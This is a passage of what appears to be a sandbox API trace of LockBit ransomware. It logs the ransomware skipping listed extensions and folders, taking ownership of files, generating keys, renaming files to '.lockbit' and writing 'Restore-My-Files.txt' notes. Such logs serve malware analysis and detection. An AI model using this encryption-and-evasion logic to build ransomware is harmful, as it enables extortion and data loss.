lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.590] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.590] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.590] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.590] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.590] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.590] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.590] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.590] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png.lockbit") returned 97 [0087.590] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.591] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.591] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.591] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.591] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.591] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.591] RtlFreeAnsiString (AnsiString="\\") [0087.591] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0087.592] malloc (_Size=0x200) returned 0x77d800 [0087.592] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.592] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.592] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.592] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.592] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.592] CloseHandle (hObject=0x3a0) returned 1 [0087.593] free (_Block=0x77d800) [0087.593] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0087.593] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.593] malloc (_Size=0x40068) returned 0x3e30078 [0087.593] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3e30090 | out: lpFileSize=0x3e30090*=3081) returned 1 [0087.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.593] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700ac, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700ac) returned 0x0 [0087.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.594] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700bc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700bc) returned 0x0 [0087.594] ReadFile (in: hFile=0x3a0, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 1 [0087.601] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.601] malloc (_Size=0xd8) returned 0x77d800 [0087.601] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xd8, FileInformationClass=0xa) returned 0x0 [0087.601] free (_Block=0x77d800) [0087.601] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter") returned 1 [0087.601] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt") returned 73 [0087.601] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.602] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff23274, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff23274, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4faf2107, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x547b, dwReserved0=0x0, dwReserved1=0x0, cFileName="shatter.png", cAlternateFileName="")) returned 1 [0087.602] lstrcmpiW (lpString1=".", lpString2="shatter.png") returned -1 [0087.602] lstrcmpiW (lpString1="..", lpString2="shatter.png") returned -1 [0087.602] PathFindExtensionW (pszPath="shatter.png") returned=".png" [0087.602] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.602] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.602] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.602] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.603] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.603] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.603] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.603] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.603] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.603] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.603] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.603] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.603] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.603] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.603] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.603] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.603] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.603] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.603] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.603] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.603] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.603] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.603] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.603] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.603] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.603] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.603] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.603] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.603] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.603] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.604] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="shatter.png") returned -1 [0087.604] lstrcmpiW (lpString1="ntldr", lpString2="shatter.png") returned -1 [0087.604] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="shatter.png") returned -1 [0087.604] lstrcmpiW (lpString1="bootsect.bak", lpString2="shatter.png") returned -1 [0087.604] lstrcmpiW (lpString1="autorun.inf", lpString2="shatter.png") returned -1 [0087.604] lstrcmpiW (lpString1="thumbs.db", lpString2="shatter.png") returned 1 [0087.604] lstrcmpiW (lpString1="iconcache.db", lpString2="shatter.png") returned -1 [0087.604] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\") returned="" [0087.604] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png") returned=".png" [0087.604] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.604] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.604] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.604] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.604] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.604] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.604] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.604] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.604] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.604] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.604] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.604] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.604] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.604] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.604] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.604] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.604] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.605] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.605] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.605] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.605] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.605] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.605] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.605] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.605] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.605] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.605] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.605] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.605] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png.lockbit") returned 72 [0087.605] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\shatter.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.605] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.606] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.606] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.606] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.606] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.606] RtlFreeAnsiString (AnsiString="\\") [0087.606] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0087.606] malloc (_Size=0x200) returned 0x77d800 [0087.606] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.606] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.606] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.606] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.607] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.607] CloseHandle (hObject=0x3c4) returned 1 [0087.607] free (_Block=0x77d800) [0087.608] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\shatter.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0087.608] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.608] malloc (_Size=0x40068) returned 0x1fb18c0 [0087.608] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=21627) returned 1 [0087.608] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.608] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0087.608] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.609] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0087.609] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0087.613] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.613] malloc (_Size=0xa6) returned 0x77d800 [0087.613] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0087.614] free (_Block=0x77d800) [0087.614] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter") returned 1 [0087.614] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt") returned 73 [0087.614] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.614] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff23274, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff23274, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4faf2107, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x547b, dwReserved0=0x0, dwReserved1=0x0, cFileName="shatter.png", cAlternateFileName="")) returned 0 [0087.614] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0087.614] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a65ec8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa92ba2a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="SpecialOccasion", cAlternateFileName="SPECIA~1")) returned 1 [0087.614] lstrcmpiW (lpString1=".", lpString2="SpecialOccasion") returned -1 [0087.614] lstrcmpiW (lpString1="..", lpString2="SpecialOccasion") returned -1 [0087.614] lstrcmpiW (lpString1="SpecialOccasion", lpString2="$windows.~bt") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="intel") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="msocache") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="$recycle.bin") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="$windows.~ws") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="tor browser") returned -1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="boot") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="system volume information") returned -1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="perflogs") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="google") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="application data") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="windows") returned -1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="windows.old") returned -1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="appdata") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="Windows nt") returned -1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="Msbuild") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="Microsoft") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="All users") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="mozilla") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="Microsoft.NET") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="microsoft shared") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="Internet Explorer") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="common files") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="opera") returned 1 [0087.615] lstrcmpiW (lpString1="SpecialOccasion", lpString2="Windows Journal") returned -1 [0087.616] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 60 [0087.616] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\*") returned 62 [0087.616] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0087.620] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0087.620] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a65ec8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa92ba2a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.621] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0087.621] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0087.621] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f446eef, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f446eef, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fc22bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0087.621] lstrcmpiW (lpString1=".", lpString2="1047x576black.png") returned -1 [0087.621] lstrcmpiW (lpString1="..", lpString2="1047x576black.png") returned -1 [0087.621] PathFindExtensionW (pszPath="1047x576black.png") returned=".png" [0087.621] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.621] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.621] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.621] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.621] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.621] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.621] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.621] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.621] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.621] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.621] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.621] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.621] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.621] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.621] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.621] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.622] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.622] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.622] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.622] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.622] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.622] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.622] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.622] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.622] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.622] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.622] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.622] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.622] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.622] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.622] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.622] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.622] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.622] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.622] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.622] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.624] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.624] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.624] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.624] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.624] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.624] 